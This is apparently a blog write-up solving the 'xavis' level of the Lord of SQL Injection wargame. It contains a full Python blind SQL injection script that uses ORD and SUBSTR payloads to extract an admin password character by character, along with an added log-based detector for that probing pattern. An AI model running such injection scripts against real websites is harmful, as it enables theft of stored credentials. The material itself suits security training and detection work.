  • [Lord of SQL Injection] xavis
    webhacking/load of sql injection 2018. 11. 17. 17:40

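    The PW is not made of ASCII characters; it is in a multibyte character format.

    ASCII(SUBSTR(PW,1,1))=97 -> the value is beyond what the ASCII table can represent, so the return value is NULL.

    ORD(SUBSTR(PW,1,1))=97 -> can compare at multibyte granularity as well.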

    Solve code:

    import requests

    url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php"
    cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" }  # session ID

    list1 = []

    # Step 1: find the length of admin's pw; i keeps the matching length after break
    for i in range(0,100):
        text = "'  or id='admin' and length(pw)="+str(i)+" -- "
        params = { 'pw' : text}
        response = requests.get( url, params = params, cookies = cookies )
        if( "Hello admin" in response.text):
            print( response.text )
            break

    # Step 2: recover each character with ORD(); SUBSTR() positions are 1-based
    for k in range( 1, i+1 ):
        for j in range( ord('0'), 300):
            text = "' or id='admin' and length(pw)="+str(i)+" and ord(substr(pw,"+str(k)+",1))="+str(j)+" -- "
            params = { 'pw' : text }
            response = requests.get( url, params = params, cookies = cookies )
            if( "Hello admin" in response.text ):
                print( response.text )
                list1.append(chr(j))
                break

    print(list1)
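
A defender-side view of the same traffic, as an added example that is not part of the original post: the script above sends one request per guessed value, so a single client trying many values of ord(substr(pw,K,1))=J against one position stands out in an access log. The log lines, the /xavis.php path, the client addresses and the min_guesses threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Matches the per-character probe used above: ord(substr(col,K,1))=J
# (ascii()/substring()/mid() variants are matched too).
PROBE = re.compile(
    r"\b(?:ord|ascii)\s*\(\s*(?:substr|substring|mid)\s*\(\s*\w+\s*,"
    r"\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)",
    re.IGNORECASE,
)
# Combined-log-style line: client address ... "GET <url> HTTP/x.y"
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def find_blind_sqli_clients(log_lines, min_guesses=5):
    """Return {client: {position: guess_count}} for clients that tried at least
    min_guesses distinct values against one character position."""
    guesses = defaultdict(lambda: defaultdict(set))
    for line in log_lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl URL-decodes each parameter value (%27 -> ', + -> space)
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for pos, val in PROBE.findall(value):
                guesses[client][int(pos)].add(int(val))
    return {
        client: {pos: len(vals) for pos, vals in by_pos.items() if len(vals) >= min_guesses}
        for client, by_pos in guesses.items()
        if any(len(vals) >= min_guesses for vals in by_pos.values())
    }

def sample_log():
    """Constructed access-log lines (not real traffic): one client walking
    values 48..57 for position 1, one client making ordinary requests."""
    lines = [
        f'203.0.113.7 - - [17/Nov/2018:17:40:00 +0900] "GET /xavis.php?pw=%27+or+id%3D%27admin%27'
        f'+and+ord%28substr%28pw%2C1%2C1%29%29%3D{j}+--+ HTTP/1.1" 200 512'
        for j in range(48, 58)
    ]
    lines.append('198.51.100.9 - - [17/Nov/2018:17:41:00 +0900] "GET /xavis.php?pw=hunter2 HTTP/1.1" 200 498')
    lines.append('198.51.100.9 - - [17/Nov/2018:17:41:05 +0900] "GET /index.php?q=ord+of+the+day HTTP/1.1" 200 300')
    return lines

if __name__ == "__main__":
    print(find_blind_sqli_clients(sample_log()))
```

Counting distinct guessed values per position, rather than matching a single request, keeps ordinary queries that merely contain the word "ord" from being flagged.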
